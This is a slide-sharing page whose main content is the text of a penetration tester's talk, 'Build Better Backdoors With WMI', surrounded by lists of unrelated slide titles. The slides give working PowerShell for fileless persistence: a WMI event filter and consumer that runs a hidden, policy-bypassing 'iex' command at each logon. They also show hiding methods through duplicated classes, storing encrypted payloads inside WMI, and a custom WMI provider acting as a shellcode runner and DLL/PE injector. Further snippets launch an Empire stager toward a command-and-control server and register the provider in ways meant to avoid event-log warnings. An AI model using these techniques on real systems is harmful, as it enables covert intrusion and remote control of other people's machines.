 
Introduction To Managing VMware With PowerShell
Introduction To Managing VMware With PowerShellIntroduction To Managing VMware With PowerShell
Introduction To Managing VMware With PowerShell
 
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
VMworld 2013: ESXi Native Networking Driver Model - Delivering on Simplicity ...
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
Webauthn Tutorial
Webauthn TutorialWebauthn Tutorial
Webauthn Tutorial
 
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...Build, migrate and deploy apps for any environment with project Hammr , OW2co...
Build, migrate and deploy apps for any environment with project Hammr , OW2co...
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack Fu
 
Advanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMIAdvanced Pen Testing Techniques-DNS-WMI
Advanced Pen Testing Techniques-DNS-WMI
 
Win32 Perl Wmi
Win32 Perl WmiWin32 Perl Wmi
Win32 Perl Wmi
 
Post exploitation using powershell
Post exploitation using powershellPost exploitation using powershell
Post exploitation using powershell
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
Integrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight ApplicationsIntegrating Security Roles into Microsoft Silverlight Applications
Integrating Security Roles into Microsoft Silverlight Applications
 
Harmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and PuppetHarmonious Development: Via Vagrant and Puppet
Harmonious Development: Via Vagrant and Puppet
 
Kioptrix 2014 5
Kioptrix 2014 5Kioptrix 2014 5
Kioptrix 2014 5
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery ManagerVMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
VMworld 2013: Three Quirky Ways to Simplify DR with VMware Site Recovery Manager
 
Malware Analysis and Defeating using Virtual Machines
Malware Analysis and Defeating using Virtual MachinesMalware Analysis and Defeating using Virtual Machines
Malware Analysis and Defeating using Virtual Machines
 

Recently uploaded

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityIES VE
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Scott Andery
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsNathaniel Shimoni
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Alkin Tezuysal
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentPim van der Noll
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...AliaaTarek5
 

Recently uploaded (20)

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
Enhancing User Experience - Exploring the Latest Features of Tallyman Axis Lo...
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
Time Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directionsTime Series Foundation Models - current state and future directions
Time Series Foundation Models - current state and future directions
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demo
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native developmentEmixa Mendix Meetup 11 April 2024 about Mendix Native development
Emixa Mendix Meetup 11 April 2024 about Mendix Native development
 
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
(How to Program) Paul Deitel, Harvey Deitel-Java How to Program, Early Object...
 

BUILD BETTER BACKDOORS WITH WMI

  • 2. 2 Confidential & Proprietary WHO AM I  Alexander Polce Leary  Senior Network & Application Pentester at NetSPI  Twitter: 0xbadjuju  KeyBase: 0xbadjuju  Blogs: https://blog.netspi.com/author/aleary/  Code: https://github.com/0xbadjuju/
  • 3. 3 Confidential & Proprietary OUTLINE 1. WMI Overview 2. Fileless Backdoors 3. WMI for Storage 4. WMI Providers 5. Installing WMI Providers https://github.com/0xbadjuju/PowerProvider https://github.com/0xbadjuju/WheresMyImplant
  • 4. 4 Confidential & Proprietary WHAT IS WMI?  Windows Management Instrumentation  Present since Windows 95  It shows  Probably familiar with some WMI functions  Win32_Process -> Create()  wmic.exe process call create …  Invoke-WmiMethod –class win32_process –name create –argumentlist …
  • 5. 5 Confidential & Proprietary WMI OVERVIEW  WMI  Namespace  Class  Property  Static || Dynamic  Method  WQL  SELECT * from class;  SQL Server  Database  Table  Row  Static  Stored Procedure  SQL  SELECT * FROM table;
  • 6. 6 Confidential & Proprietary6 Confidential & Proprietary FILELESS BACKDOORS INVOKE-WMIDUPLICATECLASS
  • 7. 7 Confidential & Proprietary WMI CLASS INHERITANCE  WMI has a robust implementation of class inheritance  CIM_ManagedSystemElement  CIM_LogicalElement  CIM_Process  Win32_Process  ???
  • 8. 8 Confidential & Proprietary DUPLICATING A WMI CLASS $NewManagementClass = $ManagementClass.Derive($DerivedClassName) $NewManagementClass.put() $NewManagementClass = $ManagementClass.Clone($ClonedClassName) $NewManagementClass.put() https://twitter.com/mattifestation/status/907702749193633792
  • 9. 9 Confidential & Proprietary HIDING WMI METHODS Invoke-WMIDuplicateClass -TargetClassName Win32_Process -DuplicateClassName Win32_Create -ComputerName $ComputerName -Credential $Credential
  • 10. 10 Confidential & Proprietary
  • 11. 11 Confidential & Proprietary Binding WMI FILELESS BACKDOORS  EventFilter  __EventFilter  Consumers  ComandLineEventConsumer  ActiveScriptEventConsumer  Binding  __FilterToConsumberBinding  Well Known and Documented Technique  https://github.com/Sw4mpf0x/PowerLurk  https://blog.netspi.com/ Event Filter (Trigger) Consumer (Action)
  • 12. 12 Confidential & Proprietary EVENT FILTER + CONSUMER EXAMPLE $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{ EventNamespace = 'root/cimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  • 13. 13 Confidential & Proprietary INVOKE-WMIDUPLICATECLASS Invoke-WMIDuplicateClass -TargetClassName CommandLineEventConsumer -DuplicateClassName DerivedEventConsumer -NameSpace ROOTSubscription ComputerName $ComputerName -Credential $Credential –Verbose $Filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter -Arguments @{ EventNamespace = 'rootcimv2' Name = “NetSPI Event Filter” Query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_LoggedOnUser'" QueryLanguage = 'WQL’ }; $Consumer = Set-WmiInstance -Namespace rootsubscription -Class DerivedEventConsumer -Arguments @{ Name = “NetSPI Event Consumer” CommandLineTemplate = “powershell.exe –NoP –NonI –W Hidden –Exec Bypass –Command “iex…” }; Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{ Filter = $Filter Consumer = $Consumer };
  • 14. 14 Confidential & Proprietary
  • 15. 15 Confidential & Proprietary15 Confidential & Proprietary WMI FOR STORAGE INVOKE-WMIFS
  • 16. 16 Confidential & Proprietary INVOKE-WMIFS 1. Create a WMI class to store file in  New-WMIFSClass 2. Read in file and base64 encode and encrypt  ConvertTo-Base64 & ConvertTo-EncryptedText 3. Slice the base64 encoded string and insert into WMI  Invoke-InsertFileThreaded 4. Retrieve the file and reassemble  Invoke-RetrieveFile 5. Base64, decrypt file, and optionally write to disk  ConvertFrom-Base64 & ConvertFrom-EncryptedText Wrapped into Invoke-WMIUpload & Invoke-WMIRemoteExtract
  • 17. 17 Confidential & Proprietary
  • 18. 18 Confidential & Proprietary18 Confidential & Proprietary WMI PROVIDERS WHERESMYIMPLANT
  • 19. 19 Confidential & Proprietary WMI PROVIDERS  These are the DLL’s behind the scenes that do all the work  Host the methods and properties that we call  cimwin32.dll  What about building our own provider?  Build the provider  Register the provider  Access the provider
  • 20. 20 Confidential & Proprietary HOW TO CREATE A PROVIDER  WmiPrvSe.exe can host the Common Language Runtime (CLR)  Opens up .Net for use in WMI  Add a few decorators to a class and your done  [ManagementEntity]  [ManagementTask] https://gist.github.com/0xbadjuju/550fb602a8b7aa610436d533c94a1885
  • 21. 21 Confidential & Proprietary BASIC BACKDOOR  Command Execution  ShellCode Runner  Dll Injector  PE Injector https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider https://github.com/subTee/EvilWMIProvider
  • 22. 22 Confidential & Proprietary
  • 23. 23 Confidential & Proprietary BASIC WMI BACKDOOR
  • 24. 24 Confidential & Proprietary
  • 25. 25 Confidential & Proprietary BETTER WMI BACKDOOR  Store Payload as Base64 Encoded String in WMI, and then inject the payload  ShellCode Runner  Dll Injector  PE Injector
  • 26. 26 Confidential & Proprietary BETTER WMI BACKDOOR
  • 27. 27 Confidential & Proprietary
  • 28. 28 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Stager? Why not? $language = “powershell” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  • 29. 29 Confidential & Proprietary EMPIRE – POWERSHELL AGENT
  • 30. 30 Confidential & Proprietary
  • 31. 31 Confidential & Proprietary WMI EMBEDDED EMPIRE? Embedded Empire Agent? Why not? $language = “dotnet” $server = “http://192.168.255.100:80” $key = “q|Q]KAe!{Z[:Tj<s26;zd9m7-_DMi3,5” Invoke-WmiMethod –Class Win32_Implant –Name Empire –ArguementList $language,$server,$key
  • 32. 32 Confidential & Proprietary EMPIRE - .NET AGENT
  • 33. 33 Confidential & Proprietary33 Confidential & Proprietary REGISTERING WMI PROVIDERS INSTALL-WMIPROVIDER
  • 34. 34 Confidential & Proprietary INSTALLUTIL.EXE PS C:> InstallUtil.exe assembly.dll PS C:> InstallUtil.exe /u assembly.dll In the Windows Event Log this triggers a warning.
  • 35. 35 Confidential & Proprietary
  • 36. 36 Confidential & Proprietary
  • 37. 37 Confidential & Proprietary .NET MANAGEDINSTALLERCLASS PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @( "C:assembly.dll") ) PS C:> [System.Configuration.Install.ManagedInstallerClass]::InstallHelper( @(“/u”, "C:assembly.dll") ) The PS version and .net assembly version need to match. In the Windows Event Log this also triggers a warning.
  • 38. 38 Confidential & Proprietary
  • 39. 39 Confidential & Proprietary
  • 40. 40 Confidential & Proprietary MANUAL REGISTRATION  What if we were to register the WMI Provider purely through WMI calls  This does not come close to fitting on a slide 1. Create the WMI_extension Class 2. Create an instance of WMI_extension for the Win32_Implant Class 3. Create an instance of __InstanceProviderRegistration for WMI_extension 4. Create an instance of __MethodProviderRegistration for WMI_extension 5. Create the Win32_Implant Class 6. Register WMI_extension in HKCR and HKLM
  • 41. 41 Confidential & Proprietary MANUAL REGISTRATION That looks hard
  • 42. 42 Confidential & Proprietary MANUAL REGISTRATION It was
  • 43. 43 Confidential & Proprietary MANUAL REGISTRATION Why would I want to do that?  Manually registering a WMI provider allows us to bypass calling any executables on the remote system  Remember those pesky Windows Event Logs warnings?  Those are caused by the default hosting model LocalSystemHost  There are many, many others to choose from.  Win32_Process -> Create() uses NetworkServiceHost  Wanna guess that that HostingModel doesn’t do?
  • 44. 44 Confidential & Proprietary MANUAL REGISTRATION Install-WMIProviderExtension -ComputerName $ComputerName -Credential $Credential -RemoteLibraryLocation C:WindowsSystem32wbemWheresMyImplant.dll -ProviderDisplayName Win32_Implant -HostingModel NetworkServiceHost:CLR
  • 45. 45 Confidential & Proprietary
  • 46. 46 Confidential & Proprietary
  • 47. 47 Confidential & Proprietary Questions?